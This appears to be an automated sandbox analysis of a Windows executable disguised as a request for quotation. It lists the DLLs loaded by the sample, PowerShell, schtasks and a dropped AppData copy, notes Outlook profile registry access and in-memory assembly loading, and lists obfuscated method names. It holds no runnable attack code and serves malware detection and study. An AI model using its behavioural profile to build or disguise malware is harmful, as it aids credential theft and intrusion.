                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                      Data Obfuscation

                      barindex
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.54c0000.3.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, OXmYbftiauxP9AL5jO.cs.Net Code: mM6bsrFDxr System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, OXmYbftiauxP9AL5jO.cs.Net Code: mM6bsrFDxr System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, OXmYbftiauxP9AL5jO.cs.Net Code: mM6bsrFDxr System.Reflection.Assembly.Load(byte[])
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeStatic PE information: 0x8DC155A3 [Sat May 13 03:10:27 2045 UTC]
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C8909 push es; ret 9_2_065C8920
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0153F288 pushfd ; iretd 10_2_0153F291
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0569C688 push eax; retf 10_2_0569C68D
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC890D push es; ret 14_2_06DC8920
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeStatic PE information: section name: .text entropy: 7.761882583486439
                      Source: nDEusQ.exe.1.drStatic PE information: section name: .text entropy: 7.761882583486439
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, x3T9Ytw1Zeo1bprUX1.csHigh entropy of concatenated method names: 'RmspEnaafS', 'u2gpjuOXwa', 'UpgpA6eQK1', 'LhAA0jkn0h', 'Pu5AzF54bE', 'vAepLVqdqw', 'II7pMVGHM3', 'wDApY4eabA', 'fmppuKiawY', 'LEqpbofcad'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, THX12LMbpUTAhaBFVoE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ds1HXU5brq', 'Q6THfENk30', 'bojHOJ4lxP', 'nQCHHNpZjc', 'T62HDYp5AA', 'oRYH3lEb4S', 'YbfHTGiEZv'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, WI4re4rlxdWBEC7k2o.csHigh entropy of concatenated method names: 'tnVA6wSEGv', 'J4AAJYZ9oi', 'LKAAl5qv9w', 'DlhApuveV9', 'cjTAt1DMx5', 'fB8lCwd4c2', 'Oe9lW2mx2d', 'jPJlgnG2jd', 'XwEl1XUDkV', 'Xm3lIgqmid'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, hKbC3fIwQJBD85kemO.csHigh entropy of concatenated method names: 'VmaXr4fPMa', 'A8IXh2aMeG', 'rXCX5EHtyh', 'zUAXdgCOjm', 'scBXQ9J23a', 'pL4XUgiTph', 'KMwXw6HVbq', 'oFrXxGMKh6', 'I6lX7xZBLl', 'lRUXP35JOM'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, WRp4DPbfMDTyk1O1Po.csHigh entropy of concatenated method names: 'rCJMpkQPIS', 'WjIMtfgwhQ', 'uCQMqlONxW', 'QLsMGvQYSC', 'vdfMvNmgI4', 'Ge4MZlxdWB', 'VxAH6WkD1hgGm2tLwP', 'vPMfZ2ZkkxSr2bXsA3', 'mESMMMGwIa', 'MAGMunlXh1'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, fkQPIScgjIfgwhQwC4.csHigh entropy of concatenated method names: 'InjJmQpfDL', 'd1QJyWnffc', 'CtdJFJTxa5', 'ddgJkmGZce', 'EehJCr1xSL', 'NKvJWUmgGJ', 'WwwJgmw8lZ', 'wriJ1AiDj5', 'jrUJIZjNy0', 'sjaJ0KMWcH'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, dAK0Jo7pGEwxjjvoZ9.csHigh entropy of concatenated method names: 'KGPp8igC05', 'uP9pVoucy9', 'n97ps73p8y', 'BjLpn6A7MZ', 'hoEp2nwJ4n', 'tHMpKihQTt', 'Wv8p9jhHqE', 'B73pc58qHb', 'feQpNqE0bI', 'lwtpRnQWmn'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, uHYtq8JGWgdmDkrnFe.csHigh entropy of concatenated method names: 'Dispose', 'MvoMI9PEDs', 'TC5YhurOt7', 'kOqHKpLdsS', 'U62M0w4T6o', 'lNgMzsP2rM', 'ProcessDialogKey', 'pEjYLKbC3f', 'LQJYMBD85k', 'kmOYY3enPD'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, U89jwOmf6bjtiChj87.csHigh entropy of concatenated method names: 'xWdvPe8pGa', 'wqhvB3ijYe', 'QRPvmWgukT', 'D7svyfy7IY', 'EMrvhlAthy', 'CJJv5kGeJd', 'WXnvdaJXeo', 'hAyvQJPFKK', 'DVmvURY217', 'jytvwpvPqU'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, JYSCnPRc3nAZm3dfNm.csHigh entropy of concatenated method names: 'Pyol20s7W6', 'mA3l9sD9Ck', 'hDcj5kOJFG', 'EBsjdpF1q4', 'QVIjQT5IbC', 'NpFjUlEqO3', 'o1Bjw3KxRo', 'JMSjxVnin9', 'wP6j7j8buK', 'rq0jP6iTd7'
